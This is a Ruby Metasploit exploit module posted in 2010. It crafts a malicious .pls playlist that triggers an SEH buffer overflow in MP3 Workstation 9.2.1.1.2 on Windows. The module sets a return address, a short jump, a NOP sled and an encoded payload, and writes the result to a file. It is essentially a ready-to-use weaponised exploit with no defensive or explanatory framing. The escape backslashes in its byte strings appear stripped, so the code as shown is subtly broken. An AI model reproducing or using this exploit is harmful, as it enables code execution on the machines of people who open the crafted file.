mp3-workstation.rb.txt
Posted on 23 September 2010
# Exploit Climatisée fermee la Porte DeRrière Twaa xDeii # Title: MP3 Workstation Version 9.2.1.1.2 buffer overflow exploit (MSF) # Sanjeev Gupta san.gupta86[at]gmail.com (http://www.exploit-db.com/exploits/15013/) # Author: MadjiX # Sec4ever.com # WinXp Fr require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'MP3 Workstation Version 9.2.1.1.2 buffer overflow', 'License' => MSF_LICENSE, 'Author' => 'MadjiX', 'Version' => 'Version 1', 'References' => [ [ 'OSVDB', '' ], [ 'URL', 'http://www.exploit-db.com/exploits/15013/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 4488, 'BadChars' => "x00x20x0ax0d", 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', { 'Ret' => 0x733DB159} ], ], 'Privileged' => false, 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'mad.pls']), ], self.class) end def exploit sploit = "MP3 Workstation" sploit << "x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Dx0Ax46x69x6Cx65x31x3D" #header -Sanjeev sploit << rand_text_alphanumeric(1940) sploit << "xebx06x90x90" # short jump 6 bytes sploit << [target.ret].pack('V') sploit << "x90" * 12 # nop sled sploit << payload.encoded sploit << "x90" * 2805 mad = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(mad) end end
